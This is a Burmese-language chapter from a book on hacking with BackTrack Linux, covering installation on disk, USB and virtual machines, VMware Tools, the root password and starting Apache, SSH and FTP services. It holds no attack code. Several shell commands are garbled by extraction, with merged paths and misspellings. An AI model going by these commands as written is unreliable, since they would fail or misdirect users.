ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 1

Up and Running with BackTrack


BackTrack ကိုထည္႕သြင္းေမာင္းႏွင္ျခင္း

မ်က္ပြင့္စာေပ 7
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction
ယခုအခန္းတြင္ BackTrack OS ကို Install ျပဳလုပ္ျခင္းႏွင့္ Setup ျပဳလုပ္ျခင္းကို အသံုးျပဳႏိုင္ေသာ
နည္းလမ္းအားလံုးျဖင့္ ေလ့လာရပါမည္။ Network တစ္ခုကို Configure ျပဳလုပ္ပံုမ်ားသာမက BackTrack
Linux DVD ကိုအသံုးျပဳျခင္းတို႕ကိုလည္း ေလ့လာႏိုင္မည္ျဖစ္ပါသည္။ ယခုစာအုပ္ပါ အေၾကာင္းအရာမ်ား
ကို BackTrack 5 R3 GNOME 64bit Version ျဖင့္အသံုးျပဳထားၿပီး ၄င္းကို ပူးတြပ
ဲ ါ၀င္ေသာအေခြ
သို႕မဟုတ္ http://www.backtrack-linux.org/downloads မွ Download ျပဳလုပ္ႏိုင္မည္ ျဖစ္ပါသည္။
သို႕ရာတြင္ KDE Version ကိုအသံုးျပဳျခင္းကိုမူ ေဖာ္ျပေပးမည္မဟုတ္ပါ။ သိ႕ု ရာတြင္ GNOME ႏွင့္ KDE
သည္အလြန္တရာကြာျခားျခင္းမရိွသည္႕အတြက္ ေလ့လာရာတြင္အခက္အခဲမရိွဘဲ အသံုးျပဳေစႏိုင္မည္
ျဖစ္ပါသည္။ ယခုအခန္းတြင္ ေအာက္ပါသင္ခန္းစာအစိတ္အပိုင္းမ်ားကို ေလ့လာရေစမည္ျဖစ္ပါသည္။

- Installing BackTrack to a hard disk drive


- Installing BackTrack to a USB drive with persistent memory
- Installing BackTrack on VirtualBox
- Installing BackTrack using Vmware Tools
- Fixing the Splash Screen
- Changing the root password
- Starting network services
- Setting up the wireless network

Installing BackTrack to a hard disk drive


OS တစ္ခုကို Hard Disk Drive ထဲသို႕ထည္႕သြင္းျခင္းသည္ အလြန္လြယ္ကူၿပီး အေျခခံက်ေသာ
လုပ္ေဆာင္ခ်က္တစ္ရပ္ျဖစ္ပါသည္။ ထိုသို႕ထည္႕သြင္းျခင္းျဖင့္ DVD Disk တစ္ခု၏အကူအညီမယူဘဲ
Hard Disk မွတိုက္ရိုက္အသံုးျပဳႏိုင္မည္ျဖစ္ပါသည္။

မွတ္ရန္။ ။ယခုေဖာ္ျပပါနည္းလမ္းမ်ားကိုအသံုးျပဳ၍ Hard Disk မွ အျခားေသာ OS မ်ားကိုဖ်က္ကာ


Primary OS အျဖစ္ BackTrack ကိုအသံုးျပဳရန္အတြက္ လုပ္ေဆာင္ႏိုင္ပါသည္။

8 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ေဖာ္ျပပါလုပ္ေဆာင္ခ်က္မ်ားကို မေဖာ္ျပေသးမီ BackTrack ကိုအသံုးျပဳႏိုင္ရန္အတြက္ ေအာက္ေဖာ္ျပပါ


လိုအပ္ခ်က္မ်ားကို သိရိွနားလည္ႏိုင္ရန္လိုအပ္ပါသည္။

- အနည္းဆံုး 25GB ရိွေသာ Hard Disk


- BackTrack Live DVD တို႕ပင္ျဖစ္ပါသည္။ (ပူးတြပ
ဲ ါအေခြ) ထိ႕ု ေနာက္လုပ္ေဆာင္ခ်က္မ်ားကို
စတင္ႏိုင္ၿပီျဖစ္ပါသည္။

၁။ BackTrack Live DVD ကို DVD Drive ထဲသို႕ထည္႕၍ CD မွစတင္ Boot လုပ္ပါ။ ထိုအခါ CD မွ
အလိုအေလ်ာက္ Boot လုပ္မည္ျဖစ္ၿပီး ေအာက္ေဖာ္ျပပါပံုအတိုင္း BackTrack ၏ Desktop တက္လာ
သည္ကိုေတြ႕ရမည္ျဖစ္ပါသည္။ ပံုတြင္ေတြ႕ရသည္႕ Install BackTrack ကို Double Click ႏိွပ္၍
ေမာင္းႏွင္ေပးရပါမည္။

၂။ ႏွစ္သက္ရာဘာသာစကားကိုေရြးခ်ယ္ၿပီးေနာက္ Forward Button ကို Click ႏိွပ္ပါ။

၃။ Geographical Location (ေနထိုင္ေသာေနရာ) ကိုေရြးခ်ယ္ၿပီးေနာက္ Forward ကို Click ႏိွပ္ပါ။


ေအာက္ေဖာ္ျပပါပံုအတိုင္းေတြ႕ရိွရပါမည္။

မ်က္ပြင့္စာေပ 9
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ ႏွစ္သက္ရာ Keyboard Layout ကိုေရြးခ်ယ္ၿပီး ေရွ႕ဆက္ရန္ Forward Button တြင္ Click တစ္ခ်က္
ႏိွပ္ေပးပါ။

၅။ ေအာက္တြင္ေဖာ္ျပထားသည္႕အတိုင္း Default Option (၄င္းသည္ Hard Disk တစ္ခုလံုးကိုဖ်က္မည္)


ကိုေရြးခ်ယ္၍ Forward ခလုတ္ကို တစ္ႀကိမ္ထက္မနည္းႏိွပ္ေပးရပါမည္။
10 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ Install အက်ဥ္းခ်ဳပ္ေပၚလာပါလိမ့္မည္။ Settings မ်ားမွန္၊ မမွန္စစ္ေဆးပါ။ Install ခလုတ္ကို တစ္ခ်က္


ႏိွပ္ပါ။

၇။ Install ျပဳလုပ္ျခင္းစတင္မည္ျဖစ္ၿပီး ၿပီးဆံုးရန္အတြက္ မိနစ္အနည္းငယ္ေစာင့္ဆိုင္းေပးရပါမည္။

မ်က္ပြင့္စာေပ 11
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ ေနာက္ဆံုးတြင္ Install လုပ္ေဆာင္ျခင္းၿပီးဆံုးမည္ျဖစ္ၿပီး BackTrack ကို Install ထပ္လုပ္စရာမလိုပဲ


အသံုးျပဳႏိုင္မည္ျဖစ္သည္။ ထိ႕ု ေနာက္ Restart Now ကိုတစ္ခ်က္ႏိွပ္ျခင္းျဖင့္ ကြန္ပ်ဴတာကို Reboot ျပဳလုပ္
ရပါမည္။ ျပန္တက္လာေသာအခါတြင္ username တြင္ root ဟုအသံုးျပဳရမည္ျဖစ္ၿပီး password ေနရာ
တြင္မူ toor ဟုအသံုးျပဳရပါမည္။



12 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Installing BackTrack to a USB drive with


presistent memory
BackTrack ထည္႕သြင္းထားေသာ USB Drive တစ္ခုရိွျခင္းသည္ System Settings မ်ားကို ထိုအထဲသို႕
အဆင္ေျပေစရန္ ေျပာင္းလဲထားႏိုင္ၿပီး အသစ္ေသာ Software Package မ်ားကိုလည္း USB Drive ေပၚသို႕
ကူးယူႏိုင္ပါသည္။ ထို႕ေၾကာင့္ ထိုသို႕ျပဳလုပ္ထားျခင္းသည္ BackTrack ကိုကြန္ပ်ဴတာတိုင္းတြင္ မိမိ စိတ္
ႀကိဳက္အစီအစဥ္ျဖင့္ အသံုးျပဳႏိုင္ရန္အတြက္ အေထာက္အပံ့ျဖစ္ေစမည္ျဖစ္သည္။

ထိုသို႕အသံုးျပဳႏိုင္ရန္အတြက္ ေက်းဇူးတင္ရမည္႕ Tool မ်ားမွာ UnetBootIn ကဲ့သို႕ေသာ Open Source


Tool မ်ားျဖစ္ကာထို Tool မ်ား၏အကူအညီမ်ားေၾကာင့္သာ BackTrack ကဲ့သို႕ေသာ Linux Distribution
အမ်ားအျပားကို Bootable Live USB Drive အျဖစ္ persistent storage အေနျဖင့္ အသံုးခ်ေစႏိုင္
မညျ္ဖစ္သည္။ ထိုသို႕လုပ္ေဆာင္ရန္အတြက္ ေအာက္ေဖာ္ျပပါ လိုအပ္ခ်က္မ်ားျဖင့္ ျပည္႕စံုရပါမည္။

- 8 GB ပမာဏရိွေသာ FAT32 စနစ္ျဖင့္ Format ျပဳလုပ္ထားေသာ USB Drive တစ္ခု


- BackTrack ISO Image
- Unetbootin (unetbootin.sourceforge.net/unetbootin-windows-latest.exe)
- BackTrack 5 ကို http://www.backtrack-linux.org/downloads/ မွ Download ျပဳလုပ္ႏိုင္
မည္ျဖစ္ပါသည္။

စတင္လုပ္ေဆာင္ရန္အတြက္

၁။ Format ျပဳလုပ္ထားၿပီးျဖစ္ေသာ USB Drive ကိုကြန္ပ်ဴတာတြင္တပ္ဆင္ပါ။

၂။ Unetbootin ကို Right Click ႏိွပ္ၿပီးေနာက္ Run as administrator ျဖင့္ ေမာင္းႏွင္ရပါမည္။


မ်က္ပြင့္စာေပ 13
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ေအာက္ေဖာ္ျပပါပံုအတိုင္းေပၚလာေသာအခါတြင္ Diskimage Option ကိုေရြးခ်ယ္ရမည္ျဖစ္ၿပီး Back-


Track DVD ISO Image ထားေသာ လမ္းေၾကာင္းကိုေရြးခ်ယ္ေပးရပါမည္။

၄။ Persistence အတြက္ အသံုးျပဳရမည္႕ Space ပမာဏကိုသတ္မွတ္ေပးရပါမည္။ မ်ားေသာအားျဖင့္ 8GB


ပမာဏမွ 4096 MB ကို အသံုးျပဳရမည္ျဖစ္သည္။

၅။ တပ္ဆင္ထားသည္႕ USB Drive ကို္ေရြးခ်ယ္ရမည္ျဖစ္ၿပီး OK ခလုတ္ကိုႏိွပ္ျခင္းျဖင့္ Bootable USB


Drive ကိုစတင္တည္ေဆာက္ႏိုင္မည္ျဖစ္သည္။
14 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ လုပ္ေဆာင္ခ်က္မ်ားသည္ အခ်ိန္အနည္းငယ္ေပးရမည္ျဖစ္ၿပီး DVD ISO မွဖိုင္မွ လိုအပ္ေသာ ဖိုင္မ်ားကို


USB Drive အတြင္းသို႕ကူးေျပာင္းေပးမည္ျဖစ္သည္။

၇။ Installation လုပ္ငန္းစဥ္ၿပီးဆံုးသြားေသာအခါ Computer ကို္ Reboot ျပဳလုပ္ရမည္ျဖစ္ၿပီး တည္


ေဆာက္ထားေသာ BackTrack USB Drive ကို First Boot ထား၍ ကြန္ပ်ဴတာကို ျပန္ဖြင့္ရပါမည္။

မွတ္ရန္။ ။ အကယ္၍ USB drive တြင္သိမ္းဆည္းထားေသာ အခ်က္အလက္မ်ားအတြက္ စိတ္မခ်


ျဖစ္ေနပါက Encrypt နည္းပညာကိုအသံုးျပဳ၍ လံုၿခံဳေရးကိုတိုးျမွင့္ေပးႏိုင္ပါသည္။ ထိုကဲ့သို႕ Bootable
ျပဳလုပ္ႏိုင္ေသာ USB Thumb Drive ကို http://www.infosecramblings.com/backtrack/backtrack-
မ်က္ပြင့္စာေပ 15
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

5-bootable-usb-thumb-drive-with-full-disk-encryption တြင္ေရးသားေဖာ္ျပထားေသာ “Full” Disk


Encryption article အပိုင္းတြင္ဖတ္ရွဳႏိုင္ပါသည္။

Installing BackTrack on VirtualBox


ေဖာ္ျပပါလုပ္ေဆာင္ခ်က္မ်ားသည္ BackTrack စနစ္ကို လံုး၀ဥသံုကြန္ပ်ဴတာတြင္ Install ျပဳလုပ္ သံုးစြျဲ ခင္း
ျဖစ္ၿပီး BackTrack OS စနစ္သည္ အငွါး (Guest) Operating System တစ္ခုအေနျဖင့္ အသံုးျပဳ
ေစႏိုင္မည္ျဖစ္သည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ VirtualBox Software ကိုအသံုးျပဳႏိုင္ပါသည္။ စတင္ အသံုး
ျပဳႏိုင္ရန္အတြက္

- ေနာက္ဆံုး Virtual Box Software ကိုလုိအပ္မည္ျဖစ္သည္။ ထို Software ကို https://www.


virtualbox.org/wiki/downloads မွ ရယူႏိုင္ပါသည္။
- BackTrack Iso Image တစ္ခုကိုလည္း လိုအပ္မည္ျဖစ္ပါသည္။ ယင္း ISO ဖိုင္ကို http://www.
Backtrack-linux.org/downloads/ မွ ရယူႏိုင္ပါသည္။ စတင္လုပ္ေဆာင္ရန္အတြက္
ေအာက္တြင္ ေဖာ္ျပထားေသာအဆင့္မ်ားအတိုင္း ျပဳလုပ္ေပးရပါမည္။

၁။ VirtualBox ကိုဖြင့္ပါ။ New တြင္ Click ႏိွပ္ၿပီး Virtual Maching Wizard ကိုစတင္ရပါမည္။

၂။ Next Button ကို Click ႏိွပ္ကာ Virtual Machine တြင္အသံုးျပဳမည္႕နာမည္ကိုရိုက္ထည္႕ေပးရပါမည္။


ထို႕ေနာက္ အသံုးျပဳမည္႕ OS အမ်ိဳးအစားကိုထပ္မံေရြးခ်ယ္ေပးရမည္ျဖစ္ၿပီး မ်ားေသာအားျဖင့္ Linux ကို
ေရြးခ်ယ္ေပးသင့္ၿပီး Ubuntun (64bit) ဟုေရြးခ်ယ္ေပးႏိုင္ပါသည္။ ထို႕ေနာက္ ေရွ႕ဆက္ႏိုင္ရန္အတြက္
Next ကိုေရြးခ်ယ္ေပးပါ။

16 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ထို႕ေနာက္တြင္ Base Memory (RAM) ပမာဏကိုသတ္မွတ္ေပးရမည္ျဖစ္သည္။ အကယ္၍ စက္မွ


သတ္မွတ္ေပးေသာပမာဏကိုသာအသံုးျပဳမည္ဆိုပါကေျပာင္းလဲစရာလိုအပ္မည္မဟုတ္ပဲ Next တြင္ Click
ႏိွပ္ျခင္းျဖင့္ ေရွ႕ဆက္ႏိုင္မည္ျဖစ္ပါသည္။

၄။ New Virtual Machine အတြက္ New Virtual Hard Disk ကိုစတင္ဖန္တီးေပးရမည္ျဖစ္သည္။


ထို႕ေနာက္ Next တြင္ Click ႏိွပ္ပါ။

မ်က္ပြင့္စာေပ 17
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ ထိုအခါ Wizard Window အသစ္တစ္ခုေပၚလာမည္ျဖစ္သည္။ အျခားေသာ Virtualization Software


မ်ားကို အသံုးျပဳရန္ဆႏၵမရိွပါက Default VDI file type ျဖင့္ခ်န္လွပ္ထားႏိုင္ပါသည္။

၆။ Vitual Disk Storage Detail ျဖင့္ Default Option အတိုင္းသာထားကာ ေရွ႕ဆက္ရန္အတြက္ Next
တြင္ Click ႏိွပ္ေပးပါ။

၇။ ထို႕ေနာက္ Vitual Disk File Location ႏွင့္ အရြယ္အစားကိုသတ္မွတ္ေပးရပါမည္။

၈။ သတ္မွတ္ထားေသာ Settings မ်ားမွန္ကန္ေအာင္စစ္ေဆးၿပီးေနာက္ Virtual Disk File Creation ကို


စတင္လုပ္ေဆာင္ႏိုင္ရန္အတြက္ Create Button ကို Click ႏိွပ္ပါ။

၉။ ထို႕ေနာက္ လြန္ခဲ့ေသာ Wizard မ်ားမွ အက်ဥ္းခ်ဳပ္အခ်က္အလက္မ်ားကိုေဖာ္ျပေပးေနမည္ျဖစ္သည္။


ထို႕ေနာက္ Create ကို Click ႏိွပ္ျခင္းျဖင့္ လုပ္ေဆာင္ခ်က္မ်ား ၿပီးဆံုးမည္ျဖစ္ပါသည္။

18 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ Virtual Machine တစ္ခုကို ဖန္တီးၿပီးစီးေသာအခါတြင္ BackTrack OS ကို Install ျပဳလုပ္ရန္


အဆင္သင့္ျဖစ္ေနၿပီျဖစ္သည္။

၁၁။ VirtualBox Main Window ေပၚတြင္ Backtrack 5 R2 Gnome 64bit ကို Select ျပဳလုပ္ကာ
ေအာက္တြင္ေဖာ္ျပထားေသာပံုအတိုင္း Settings Button တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။

၁၂။ ထို႕ေနာက္ Installation လုပ္ငန္းစဥ္ႏွင့္သက္ဆိုင္ေသာအခ်က္အလက္မ်ားကို ျမင္ေတြ႕ရမည္ျဖစ္ၿပီး


ISO တည္ေနရာလမ္းေၾကာင္းကို လမ္းညြန္ေပးရပါမည္။ သို႕မဟုတ္ ISO ကို DVD ေခြအျဖစ္သို႕ Burn ၍

မ်က္ပြင့္စာေပ 19
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

လည္းအသံုးျပဳႏိုင္ပါသည္။ ေအာက္တြင္ေဖာ္ျပထားသည္႕ပံုအတိုင္း Settings Screen ေပၚလာေသာအခါ


တြင္ Storage Menu Option တြင္ Click တစ္ခ်က္ႏိွပ္ေပးရပါမည္။

၁၃။ ထို႕ေနာက္ Storage Tree ေအာက္မွ Empty Disc Icon တြင္ ေရြးခ်ယ္ၿပီး ထိုမွ Attributes တြင္ IDE
Controller ကို ဆက္လက္ေရြးခ်ယ္ေပးပါ။ ယင္းသည္ Virtual အျဖစ္သတ္မွတ္ထားေသာ CD/DVD ROM
Drive လည္းျဖစ္ပါသည္။ လုပ္ေဆာင္ပံုမ်ားကို ေအာက္တြင္ပံုႏွင့္တကြေဖာ္ျပထားပါသည္။ ထို႕ေနာက္ေရြး
ခ်ယ္စရာမ်ားကို ေရြးခ်ယ္ၿပီးစီးပါက OK တြင္ Click ႏိွပ္ေပးပါ။

20 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၄။ ထို႕ေနာက္ Main Window သို႕ျပန္ေရာက္သြားမည္ျဖစ္ၿပီး Start Button ကို Click ႏိွပ္ေရြးခ်ယ္ေပးရ
ပါမည္။ ထိုအခါ အသစ္ထည္႕သြင္းလိုေသာ OS ကို ထည္႕သြင္းေနသည္ကို ေစာင့္ဆိုင္းေပးရမည္ျဖစ္ပါ
သည္။

မွတ္ရန္။ ။VirtualBox Extension Pack ကုိ Install ျပဳလုပ္ျခင္းသည္ USB 2.0 (EHCI) device
မ်ား၊ Virtual Box RDP ႏွင့္ Intel PXE boot ROM တိ႕ု ကိုထည္႕ျခင္းေပးျခင္းျဖင့္ Virtualization Product
မ်ား၏ လုပ္ေဆာင္ႏိုင္စြမ္းကို တိုးၿမွင့္ေပးေစပါသည္။

Installing BackTrack Using Vmware Tools


BackTrack OS ကို Vmware ျဖင့္အသံုးျပဳႏိုင္ရန္အတြက္လုပ္ေဆာင္ရမည္ ႕ လုပ္ေဆာင္ခ်က္မ်ားကို
ေအာက္တြင္ အဆင့္အလိုက္ေဖာ္ျပေပးထားပါသည္။ လိုအပ္ေသာ ပစၥည္းမ်ားမွာ

- BackTrack Vmware Virtual Machine ႏွင့္


- Internet လိုင္းတစ္ခုပင္ျဖစ္ပါသည္။ လုပ္ေဆာင္ရမည္႕လုပ္ေဆာင္ခ်က္မ်ားကို ေအာက္တြင္
ေဖာ္ျပထားပါသည္။

၁။ Virtual Machine မွ အသံုးျပဳထားေသာ Operating System ကို ဖြင့္၍ Internet ျဖင့္ခ်ိတ္ဆက္ေပး


ထားရပါမည္။ ထို႕ေနာက္ Terminal Windows ကိုဖြင့္၍ ေအာက္တြင္ေဖာ္ျပထားေသာ Command ကို ရိုက္
ထည္႕ေပးရပါမည္။

prepare-kernel-sources

(မွတ္ခ်က္။ ။ အထက္ပါအေၾကာင္းအရာမ်ားသည္ Linux သို႕မဟုတ္ Mac OS ကိုအသံုးျပဳေနသူမ်ား


အတြက္သာ ရည္ရြယ္ပါသည္။ Windows အသံုးျပဳသူမ်ားတြင္ ယခုေဖာ္ျပပါလုပ္ေဆာင္ခ်က္မ်ားကို ျပဳလုပ္
ရန္မလိုအပ္ပါ)

၂။ Vmware WorkStation ၏ Menu Bar မွ VM တြင္ Click ႏိွပ္၍ ထပ္မံေပၚလာေသာ Menu တြင္ Install
Vmware Tools ကို Click ႏိွပ္ေရြးခ်ယ္ေပးရပါမည္။

မ်က္ပြင့္စာေပ 21
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ Vmware Tool Installer ကို ယာယီလမ္းေၾကာင္းတစ္ခုေပၚသို႕ကူးေျပာင္းေပးရမည္ျဖစ္ၿပီး


ေအာက္တြင္ေဖာ္ျပထားေသာ Target Directory ကိုေျပာင္းလဲေပးရမည္ျဖစ္ပါသည္။

cp /media/Vmware\ Tools/VmwareTools-8.8.2-590212.tar.gz /tmp /cd/ tmp/

(မွတ္ရန္။ ။ အစားထိုးရမည္႕လမ္းေၾကာင္းသည္ Vmware Tools Version အေပၚမူတည္၍


အေျပာင္း အလဲရိွႏိုင္ပါသည္)

၄။ Installer ကို Untar ျပဳလုပ္ရန္အတြက္ ေအာက္ေဖာ္ျပပါ Command ကိုအသံုးျပဳရပါမည္။

tar zxpf WMwareTools -8.8.2-590212.tar.gz

၅။ ထို႕ေနာက္ VMWare Tools Directory ကိုသြားေရာက္ၿပီးေနာက္ Installer ကိုေမာင္းႏွင္ရပါမည္။

cd vmware-tools-distrib/./vmware-install.pl

၆။ Configuration တစ္ခုစီကို Default Values ျပဳလုပ္ႏိုင္ရန္အတြက္ Enter ကိုႏိွပ္ေပးရပါမည္။


တူညီေသာ လုပ္ေဆာင္ခ်က္အားလံုးသည္ vmware-config-tools.pl script ျဖင့္ သက္ဆိုင္ေစမည္
ျဖစ္ပါသည္။

၇။ ၿပီးဆံုးေသာအခါတြင္ ကြန္ပ်ဴတာကို Restart ျပဳလုပ္ပါ။ လုပ္ေဆာင္ခ်က္မ်ားၿပီးဆံုးမည္ျဖစ္ပါသည္။

22 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Fixing the splash screen


ပထမဆံုးအေနျဖင့္ BackTrack System ျဖင့္ Install ျပဳလုပ္ထားေသာ ကြန္ပ်ဴတာတြင္ Boot
လုပ္ေသာအခါတြင္ Splash Screen ေပ်ာက္ကြယ္သြားသည္ကိုေတြ႕ရမည္ျဖစ္သည္။ ယင္းကို ကိုယ္တိုင္
ျပဳလုပ္အသံုးျပဳျခင္းျဖင့္ Fix ျပဳလုပ္ထားႏိုင္ပါသည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္ initrd ကို Extract ျပဳလုပ္ရ
မည္ျဖစ္ၿပီး ၄င္းကိုပင္ျပင္ဆင္ထားရန္လိုအပ္ပါမည္။ ထို႕ေနာက္ Compress ျပန္လည္ျပဳလုပ္ရပါမည္။
ထိုသို႕ျပဳလုပ္ရန္လိုအပ္ေသာ လုပ္ေဆာင္ခ်က္မ်ားကိုေအာက္တြင္အဆင့္အလိုက္ေဖာ္ျပထားပါသည္။

၁။ ေပ်ာက္ကြယ္ေနေသာ Splsah Screen ကို fix လုပ္ရန္အတြက္ terminal တြင္ေအာက္ေဖာ္ျပပါ


Command ကိုရိုက္ထည္႕ေပးရပါမည္။ ထိ႕ု ေနာက္ Enter ကိုႏိွပ္ပါ။

fix-splash

၂။ ထို႕ေနာက္ ေအာက္ပါပံုအတိုင္းေတြ႕ျမင္ရမည္ျဖစ္သည္။

Changing the root password


လံုၿခံဳေရးႏွင့္သက္ဆိုင္ေသာ အေၾကာင္းျပခ်က္မ်ားအတြက္ OS ကို Install ျပဳလုပ္စဥ္က
ပါ၀င္ေသာ Root Password ကိုေျပာင္းလဲထားျခင္းသည္ ေကာင္းမြန္ေသာလုပ္ေဆာင္ခ်က္တစ္ခုလည္း
ျဖစ္ပါသည္။ ထိုသို႕ေျပာင္းလဲထားျခင္းျဖင့္ မသက္ဆိုင္သူမ်ားမွ ၀င္ေရာက္အသံုးျပဳျခင္းမရိွႏိုင္ေစရန္
ကာကြယ္ထားႏိုင္မည္ျဖစ္ၿပီး ေနာက္ဆက္တြဲ မသက္ဆိုင္ေသာ၀င္ေရာက္အသံုးျပဳျခင္းမ်ားကို ေရွာင္လႊဲႏိုင္
ေစမည္ျဖစ္ပါသည္။ ထိုသို႕ ေျပာင္းလဲရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

passwd
မ်က္ပြင့္စာေပ 23
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ထို႕ေနာက္ Password အသစ္ကိုရိုက္ထည္႕၍ Enter ကိုႏိွပ္ပါ။ ထိုအခါ Password ကိုေနာက္တစ္ႀကိမ္ကို


ျပန္ရိုက္ေပးရပါမည္။

Starting network Services


BackTrack တြင္ Network Service အမ်ားအျပားပါ၀င္ေလ့ရိွၿပီး ၄င္း Service မ်ားသည္
အေျခအေနကိုလုိက္၍ အသံုး၀င္ေလ့ရိွပါသည္။ သို႕ရာတြင္ပံုမွန္အားျဖင့္ ပိတ္ထားတတ္ပါသည္။ ထိုပိတ္
ထားေသာ Service မ်ားကိုျပန္လည္အသံုးျပဳႏိုင္ေစရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားေသာ လုပ္ေဆာင္
ခ်က္မ်ားအတိုင္း လုပ္ေဆာင္ေပးရပါမည္။ ထိုသို႕လုပ္ေဆာင္ႏိုင္ရန္အတြက္ ခ်ိတ္ဆက္မႈရိွေသာ Network
Connection တစ္ခုကိုသတ္မွတ္ေပးထားရမည္ျဖစ္ၿပီး အဆိုပါ Connection တြင္ အသံုးျပဳႏိုင္ေသာ IP
Address ကိုသတ္မွတ္ေပးထားရမည္ျဖစ္ပါသည္။

၁။ Apache Web Server ကိုစတင္ရန္အတြက္ ေအာက္ပါ Command ကို ရိုက္ထည္႕ေပးရပါမည္။

service apache2 start

Server ကိုေမာင္းႏွင္ထားျခင္းရိွ၊ မရိွကို localhost address ကို ေခၚယူၾကည္႕ျခင္းျဖင့္ သိရိွႏိုင္ပါသည္။

၂။ SSH Service ကိုစတင္ရန္အတြက္ SSH Key မ်ားသည္ ပထမဆံုးအေနျဖင့္ Generate ျပဳလုပ္ထားရန္


လိုအပ္ပါသည္။ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

sshd-generate

၃။ Secure shell Server ကိုစတင္ႏိုင္ေစရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

service ssh start

24 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ Server ကို ေမာင္းႏွင္ထားျခင္း သို႕မဟုတ္ Listening ျဖစ္ျခင္းရိွမရိွေသခ်ာေစရန္အတြက္ netstat


command ကိုအသံုးျပဳေစႏိုင္ပါသည္။

netstat -tpan | grep 22

၅။ FTP Server ကိုစတင္ႏိုင္ေစရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

service pure-ftpd start

၆။ FTP Server ကိုအသံုးျပဳမႈရိွ၊မရိွ သိရိွႏိုင္ရန္အတြက္ ေအာက္ပါ Command ျဖင့္စစ္ေဆးႏိုင္ပါသည္။

netstat –ant | grep 21

၇။ Service တစ္ခုကိုပိတ္ရန္အတြက္ ေအာက္ပါ Command အတိုင္းအသံုးျပဳႏိုင္ပါသည္။

service <servicename> stop

<servicename> သည္ မိမိအသံုးျပဳထားေသာ ရပ္တန္႕လိုေသာ Network Services ျဖစ္ပါသည္။ ဥပမာ


အားျဖင့္ service apache2 stop ဟုရိုက္ထည္႕ေပးရပါမည္။

၈။ Service တစ္ခုကို Boot Time တြင္ Enable ျပဳလုပ္ႏိုင္ရန္အတြက္ ေအာက္ပါ Command အတိုင္း
အသံုးျပဳႏိုင္ပါသည္။

update-rc.d –f <servicename> defualts

ယခုေနရာတြင္ <servicename> သည္ network service ကိုဆိုလိုျခင္းျဖစ္ၿပီး Boot Time အတြင္းတြင္


လိုအပ္ေသာအခါတြင္အသံုးျပဳႏိုင္ပါသည္။ ဥပမာအားျဖင့္

update-rc.d –f ssh defaults

မွတ္ရန္။ ။ အထက္တြင္ေဖာ္ျပထားေသာ Service မ်ားကို Start Menu ၏ Service မွတစ္ဆင့္


